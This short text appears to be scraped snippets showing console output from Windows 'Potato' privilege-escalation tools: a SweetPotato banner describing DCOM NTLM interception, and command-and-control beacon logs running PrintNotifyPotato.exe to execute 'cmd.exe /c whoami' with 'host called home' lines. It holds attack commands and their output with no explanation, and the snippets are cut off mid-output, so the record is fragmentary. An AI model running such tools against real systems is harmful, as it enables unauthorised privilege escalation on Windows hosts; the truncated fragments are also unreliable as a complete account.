kokxxoo

SweetPotato by @_EthicalChaos_ Orignal RottenPotato code and exploit by @foxglovesec Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery [+] Attempting DCOM NTLM interception with CLID 4991D34B-80A1-4291-83B6-3328366B9097 on...

[*] Tasked beacon to run .NET program: PrintNotifyPotato.exe "C:\Windows\System32\cmd.exe /c whoami" [+] host called home, sent: 128121 bytes [+] received output: [*] Create PrintNotify Success! [*] Create FakeIUnknown Success! [*]...

Tasked beacon to run .NET program: PrintNotifyPotato.exe C:\Windows\System32\whoami.exe [+] host called home, sent: 128103 bytes [+] received output: [*] Create PrintNotify Success! [*] Create FakeIUnknown Success! [*] CreatePointerMoniker Success! [*]...